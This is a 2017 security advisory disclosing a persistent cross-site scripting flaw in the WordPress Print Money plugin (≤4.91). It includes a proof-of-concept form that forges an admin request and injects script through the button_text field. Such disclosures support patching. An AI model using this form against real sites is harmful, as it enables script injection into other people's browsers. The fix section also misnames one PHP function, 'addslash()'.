-----------------------------------------
- Credit : Ashiyane Digital Security Team
- Website : Www.Ashiyane.Org
- Discovered By : ZeroDay
- Release Date : March 13 , 2017
- Level : Low
-----------------------------------------
I.Vulnerability
---------------
WordPress Print Money v4.91 Plugin Persistent Cross Site Scripting
II.BackGround
-------------
Print Money is a WordPress Plugin That Make a Button To Any WordPress Image To Enable Your Visitors To Buy Prints
III.DESCRIPTION
----------------
Has been Detected a Persistent XSS Vulnerability In Print Money, That Allows
The Execution Of Arbitrary HTML/script Code To Be Executed In The Context
Of The Victim User's Browser.
IV.PROOF OF CONCEPT EXPLOIT
---------------------------
<html>
<body>
<form action="http://<target>/wp-admin/admin.php?page=print-money" method="POST">
<input type="hidden" name="button_text" value=""><script>alert("XSS By ZeroDay");</script>" />
<input type="hidden" name="img-print-btn-cats-update" value="Update" />
<input type="hidden" name="button_text_color" value="%23fff" />
<input type="hidden" name="button_bg_color" value="%%23000" />
<input type="hidden" name="position" value="top-left" />
<input type="hidden" name="container" value="entry-content%2Celements-box%2Cthn_post_wrap%2Clist-inline%2Cblog%2Cpost%2Cpost-content%2Centry%2Centry-summary%2Cgroup%2Ccontent%2Ccontent_constrain%2Cpage-content%2Cpage-content%2Crow%2Ctp-single-post%2Cbody%2Cthe-content%2Cwrapper%2Chentry" />
<input type="hidden" name="updateSubmit" value="Update" />
<input type="submit" value="Run Attack !" />
</form>
</body>
</html>
V.SYSTEM AFFECTED
-----------------
Print Money <= 4.91
VI.SOLUTION
-----------
You Can Use Filter function Like As htmlspecialchars() , addslash() , htmlentities() To Patch This
Vulnerability
VII. REFERENCES
-------------------------
https://wordpress.org/plugins/print-money/
VIII. CREDITS
-------------------------
This Vulnerability Has Been Discovered By ZeroDay
IX. ABOUT
-------------------------
ZeroDay
Researcher , Pentester